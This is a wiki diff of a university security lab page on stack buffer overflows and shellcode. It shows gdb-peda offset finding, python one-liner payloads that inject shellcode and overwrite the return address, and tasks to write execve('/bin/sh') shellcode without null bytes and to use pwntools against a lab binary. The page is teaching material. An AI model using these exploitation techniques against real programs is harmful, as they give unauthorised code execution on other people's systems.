Differences
This shows you the differences between two versions of the page.
|
cns:labs:lab-04 [2019/10/21 17:00] mihai.dumitru2201 [Phase 4: Writing the shellcode] we don't want an elf |
cns:labs:lab-04 [2022/10/31 17:22] (current) mihai.dumitru2201 [Tasks] |
||
|---|---|---|---|
| Line 1: | Line 1: | ||
| ====== Lab 04 - Exploiting. Shellcodes ====== | ====== Lab 04 - Exploiting. Shellcodes ====== | ||
| - | |||
| - | ===== Resources ===== | ||
| - | |||
| - | * [[http://shell-storm.org/shellcode/|Shellstorm - A collection of shellcodes]] | ||
| - | * [[https://trailofbits.github.io/ctf/exploits/README.html|TrailofBits guide to exploiting binaries]] | ||
| - | * [[http://security.cs.pub.ro/hexcellents/wiki/kb/exploiting/linux_abi_x64|Hexcellents - A collection of binary exploitation resources]] | ||
| - | * [[https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf| IDA cheatsheet]] | ||
| - | |||
| - | ===== Lab Support Files ===== | ||
| - | |||
| - | We will use this [[http://elf.cs.pub.ro/oss/res/labs/lab-04.tar.gz|lab archive]] throughout the lab. | ||
| - | |||
| - | Please download the lab archive an then unpack it using the commands below: | ||
| - | <code bash> | ||
| - | student@mjolnir:~$ wget http://elf.cs.pub.ro/oss/res/labs/lab-04.tar.gz | ||
| - | student@mjolnir:~$ tar xzf lab-04.tar.gz | ||
| - | </code> | ||
| - | |||
| - | After unpacking we will get the ''lab-04/'' folder that we will use for the lab: | ||
| - | <code bash> | ||
| - | student@mjolnir:~$ cd lab-04/ | ||
| - | student@mjolnir:~/lab-04$ ls | ||
| - | bin_to_hex.sh Makefile shellcode_exit.S skel_pwn.py test_shellcode.c vuln2.asm vuln.asm | ||
| - | </code> | ||
| ===== Intro ===== | ===== Intro ===== | ||
| - | Whenever an attacker manages to overwrite the return address, his primary follow-up is to divert the execution flow to his advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application. | + | Whenever an attacker manages to overwrite the return address, their primary follow-up is to divert the execution flow to their advantage. One can gain a stable foothold inside the exploited system via spawning a shell from the vulnerable application. |
| This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work: | This can be accomplished by injecting code into the application's memory (stack, heap or by other means) and diverting the execution flow to that code. Please note the following prerequisites in order for this to work: | ||
| Line 52: | Line 28: | ||
| </note> | </note> | ||
| - | You can also use IDA tool in order to analyze the binaries and the disassembled code. | + | You can also use Ghidra/IDA tool in order to analyze the binaries and the disassembled code. You can read more about using IDA [[cns:extra:ida|here]]. |
| - | ===== Debugging with IDA ===== | ||
| - | [[https://www.hex-rays.com/products/ida/ida-executive.pdf| IDA]] is a: | ||
| - | * disassembler (As a disassembler, IDA explores binary programs, for which source code isn't always available, to create maps of their execution) | ||
| - | * debugger ( IDA can be used as a local and as a remote debugger on various platforms, including the ubiquitous 80x86, typically Windows/Linux and the ARM platform and other platforms) | ||
| - | * decompiler (IDA can transform binary applications into a high level readable text. Unlike disassemblers, which perform the same task at a lower level, the decompiler output is concise, closer to the standard way programmers use to write applications). | ||
| - | You can see an example with vuln binary from lab-03 archive disassembled in IDA here: | + | ===== Tutorial ===== |
| - | {{:cns:labs:ida-vuln.jpg?700|}} | + | For this tutorial, our goal is to write, inject and use a simple shellcode. In the following steps, we will analyze a simple program, test payloads, assess the vulnerability, then create a shellcode and exploit the program. We will use a very simple shellcode, one that does: |
| - | + | ||
| - | Also, the decompiled version of the vuln binary with IDA can be seen here: | + | |
| - | + | ||
| - | {{:cns:labs:ida-vuln-decompile.jpg?700|}} | + | |
| - | + | ||
| - | + | ||
| - | You can see a more complex example, taken from ida tutorial screenshots here: | + | |
| - | + | ||
| - | {{:cns:labs:ida.gif?700|}} | + | |
| - | + | ||
| - | + | ||
| - | + | ||
| - | ===== Tutorial ===== | + | |
| - | Let's write a simple shellcode which performs | ||
| <code C> | <code C> | ||
| exit(1337); | exit(1337); | ||
| Line 110: | Line 67: | ||
| You may already see what the vulnerability consists of. | You may already see what the vulnerability consists of. | ||
| - | Inspect the binary using IDA debugging tool. | ||
| - | |||
| - | You can also find a list with basic IDA commands here: | ||
| - | [[ https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf | IDA cheatsheet]] | ||
| ==== Phase 2: Finding the vulnerability ==== | ==== Phase 2: Finding the vulnerability ==== | ||
| Line 153: | Line 106: | ||
| Stopped reason: SIGSEGV | Stopped reason: SIGSEGV | ||
| 0x0000000000400567 in main () | 0x0000000000400567 in main () | ||
| - | gdb-peda$ patto A3AA | + | gdb-peda$ patto AAdAA3AA |
| AAdAA3AA found at offset: 64 | AAdAA3AA found at offset: 64 | ||
| </code> | </code> | ||
| - | Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "A3AA" found at offset 64 in the pattern. This offset is where the return address is situated relative to our input. | + | Notice that the program crashed. We can quickly determine that the program tried to return to **0x4141334141644141**, which is in an unmapped region of memory, and thus triggered a fault. This value corresponds to the unique quad group "AAdAA3AA" found at offset 64 in the pattern. This offset is where the old RBP is situated relative to our input. |
| ==== Phase 3: Reliable crash ==== | ==== Phase 3: Reliable crash ==== | ||
| Line 166: | Line 119: | ||
| We can construct this test sequence using python from the command line: | We can construct this test sequence using python from the command line: | ||
| <code bash> | <code bash> | ||
| - | python -c "print 'A'*72 + 'BBBBBB'" | + | python -c "print('A'*72 + 'BBBBBB')" |
| </code> | </code> | ||
| Line 172: | Line 125: | ||
| <code asm> | <code asm> | ||
| - | gdb-peda$ r <<< `python -c "print ('A'*72 + 'BBBBBB')"` | + | gdb-peda$ r <<< `python -c "print('A'*72 + 'BBBBBB')"` |
| - | Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print ('A'*72 + 'BBBBBB')"` | + | Starting program: /home/stefania/cns-labs-2018/lab-06/skel/vuln <<< `python -c "print('A'*72 + 'BBBBBB')"` |
| Enjoy your leak: 0x7fffffffdc90 | Enjoy your leak: 0x7fffffffdc90 | ||
| Line 280: | Line 233: | ||
| <code bash> | <code bash> | ||
| - | python -c "print len('$(./bin_to_hex.sh shell.bin)')" | + | wc -c shell.bin |
| - | 12 | + | 12 shell.bin |
| </code> | </code> | ||
| Line 287: | Line 240: | ||
| <code bash> | <code bash> | ||
| - | python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(72-12)" | + | python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12))" |
| </code> | </code> | ||
| Line 346: | Line 299: | ||
| <code bash> | <code bash> | ||
| - | python -c "print '$(./bin_to_hex.sh shell.bin)' + 'A'*(72-12) + '\x90\xdc\xff\xff\xff\xff'" > payload | + | python -c "import sys; sys.stdout.buffer.write(b'$(./bin_to_hex.sh shell.bin)' + b'A'*(72-12) + b'\x90\xdc\xff\xff\xff\x7f')" > payload |
| gdb-peda$ r < payload | gdb-peda$ r < payload | ||
| Starting program: vuln < payload | Starting program: vuln < payload | ||
| Line 383: | Line 336: | ||
| <code bash> | <code bash> | ||
| - | cat payload - | ./vuln | + | $ cat payload - | ./vuln |
| + | </code> | ||
| + | |||
| + | If your process is not ''cat'' but something else (like python), you can place it in a subshell, chained with a no-args ''cat'' (whose behavior is simply to replicate ''stdin'' to ''stdout'': | ||
| + | |||
| + | <code bash> | ||
| + | $ (python -c "print('something')" && cat) | ./vuln | ||
| </code> | </code> | ||
| Line 389: | Line 348: | ||
| ===== Tasks ===== | ===== Tasks ===== | ||
| + | |||
| + | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
| + | |||
| + | |||
| ==== 1. write ==== | ==== 1. write ==== | ||
| Line 406: | Line 369: | ||
| <code asm> | <code asm> | ||
| + | BITS 64 | ||
| + | |||
| jmp string | jmp string | ||
| start: | start: | ||
| - | pop rcx ; pop address of `hello` variable in rcx | + | pop rsi ; pop address of `hello` variable in rsi (the 2nd syscall argument on 64 bits) |
| [...] | [...] | ||
| + | syscall ; do syscall on 64 bits | ||
| string: | string: | ||
| call start ; jump/trampoline back to start while storing the address of `hello` on the stack | call start ; jump/trampoline back to start while storing the address of `hello` on the stack | ||
| Line 415: | Line 381: | ||
| </code> | </code> | ||
| - | The call instruction will push the address of the next "instruction" (in this case, our string), onto the stack. | + | The ''call'' instruction will push the address of the next "instruction" (in this case, our string), onto the stack. |
| </note> | </note> | ||
| Line 423: | Line 389: | ||
| <code C> | <code C> | ||
| - | execve('/bin/sh', ['/bin/sh'], 0); | + | execve("/bin/sh", ["/bin/sh", NULL], NULL); |
| </code> | </code> | ||
| - | Where //['/bin/sh']// denotes the **address** of the string '/bin/sh'. | + | Where ''["/bin/sh", NULL]'' denotes the **address** of the array of two strings address: the address of the ''"/bin/sh"'' string and the ''NULL'' address. |
| <note tip> | <note tip> | ||
| - | You need to get the string '/bin/sh' on the stack. You can do this using the hack from the write challenge. | + | You need to get the address of the string ''"/bin/sh"'' on the stack. |
| + | You can do this using the hack from the write challenge. | ||
| </note> | </note> | ||
| <note tip> | <note tip> | ||
| - | You can browse around shellstorm for examples; however, keep in mind that they may not work due to some registers not being set properly. | + | You can browse around shellstorm for examples; |
| + | however, keep in mind that they may not work due to some registers not being set properly. | ||
| </note> | </note> | ||
| ==== 3. execve with no zeros ==== | ==== 3. execve with no zeros ==== | ||
| Line 453: | Line 421: | ||
| Lastly, let's use [[https://github.com/Gallopsled/pwntools|pwntools]] to do most of the work for us and exploit **vuln** once more. Fill in the values in **skel_pwn.py** and run the script. | Lastly, let's use [[https://github.com/Gallopsled/pwntools|pwntools]] to do most of the work for us and exploit **vuln** once more. Fill in the values in **skel_pwn.py** and run the script. | ||
| + | |||
| + | |||
| + | ===== Resources ===== | ||
| + | |||
| + | * [[http://shell-storm.org/shellcode/|Shellstorm - A collection of shellcodes]] | ||
| + | * [[https://trailofbits.github.io/ctf/exploits/README.html|TrailofBits guide to exploiting binaries]] | ||
| + | * [[http://security.cs.pub.ro/hexcellents/wiki/kb/exploiting/linux_abi_x64|Hexcellents - A collection of binary exploitation resources]] | ||
| + | * [[https://www.hex-rays.com/products/ida/support/freefiles/IDA_Pro_Shortcuts.pdf| IDA cheatsheet]] | ||
